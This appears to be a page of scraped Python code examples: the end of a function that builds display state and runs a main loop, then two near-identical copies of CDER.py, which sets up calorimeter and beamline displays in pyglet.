    menu_lines = {button['upper'] for button in menu_conf}

    menu_lines.remove(max(menu_lines))

    ##
    # Init display
    ##
    state = DataClass({
        'ph': PointHolder(),
        'color': colors['black'],
        'setcolor': None,
        'menu': {
            'buttons': menu_buttons,
            'lines': menu_lines,
        }
    })

    def colorset(c):
        nonlocal state

        if c is None or type(c) is tuple:
            state.color = c
            state.ph.color = c

    state.setcolor = colorset

    displayer = Display(front.cropper.dimensions, state)

    ##
    # Main Loop
    ##
    fps = 25
    period = 1000 // fps
    main_loop(period, displayer, (front, top, menu), state)
    print()
Example #11
File: CDER.py Project: emitc2h/CDER

import pyglet
from core import config

####################################################
## Instantiate calorimeter and beamline
calorimeters = []
if config.em_display:
    from core.calorimeter import em
    calorimeters.append(em.EM_Calorimeter())
if config.had_display:
    from core.calorimeter import had
    calorimeters.append(had.HAD_Calorimeter())
    
from core.particle import beamline
beam = beamline.Beamline()


####################################################
## Instantiate Display
from core.display import Display
display = Display(calorimeters, beam)
display.clear()

        
####################################################
## Run pyglet:
if __name__ == '__main__':
    pyglet.app.run()
Example #12
#   You should have received a copy of the GNU General Public License       #
#   along with CDER.  If not, see <http://www.gnu.org/licenses/>.           #
#############################################################################

import pyglet
from core import config

####################################################
## Instantiate calorimeter and beamline
calorimeters = []
if config.em_display:
    from core.calorimeter import em
    calorimeters.append(em.EM_Calorimeter())
if config.had_display:
    from core.calorimeter import had
    calorimeters.append(had.HAD_Calorimeter())

from core.particle import beamline
beam = beamline.Beamline()

####################################################
## Instantiate Display
from core.display import Display
display = Display(calorimeters, beam)
display.clear()

####################################################
## Run pyglet:
if __name__ == '__main__':
    pyglet.app.run()